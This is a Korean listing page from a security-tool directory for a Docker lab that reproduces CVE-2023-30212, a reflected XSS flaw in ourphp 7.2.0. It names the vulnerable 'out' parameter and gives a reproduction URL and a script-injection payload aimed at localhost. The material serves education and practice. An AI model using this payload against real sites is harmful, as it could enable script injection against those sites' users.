Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-30212-POC-DOCKER-FILE — 이 저장소는 CVE-2023-30212 취약점을 시뮬레이션하기 위한 Docker 컨테이너를 제공하여, 그 영향을 실습하고 이해할 수 있게 해줍니다. 자신의 컴퓨터에서 컨테이너를 설정하는 데 도움이 되는 종합 가이드가 포함되어 있습니다. Docker 생성 과정에 대한 문서도 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/rishipatidar/cve-2023-30212-poc-docker-file
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityLearning & EducationLabs & Practice
GitHubrishipatidar/cve-2023-30212-poc-docker-file

CVE-2023-30212-POC-DOCKER-FILE

이 저장소는 CVE-2023-30212 취약점을 시뮬레이션하기 위한 Docker 컨테이너를 제공하여, 그 영향을 실습하고 이해할 수 있게 해줍니다. 자신의 컴퓨터에서 컨테이너를 설정하는 데 도움이 되는 종합 가이드가 포함되어 있습니다. Docker 생성 과정에 대한 문서도 포함되어 있습니다.

저장소 보기
1123년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-30212 POC : 크로스 사이트 스크립팅 (XSS)

/client/manage/ourphp_out.php를 통한

CVE-2023-30212의 영향을 받는 제품 :

VendorProductVersion
ourphpourphp7.2.0

Docker 설치 가이드 :

Docker에서 OURPHP <= 7.2.0을 설치하려면 가이드 를 사용하여 실습용 Docker를 설치할 수 있습니다.

취약점 설명:

# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"

취약점 재현 단계:

# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

취약점 페이로드:

# </script><script>alert(`xss`)</script>

동영상

CVE-2023-30212

참고 자료

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> 참조 코드
도구 다운로드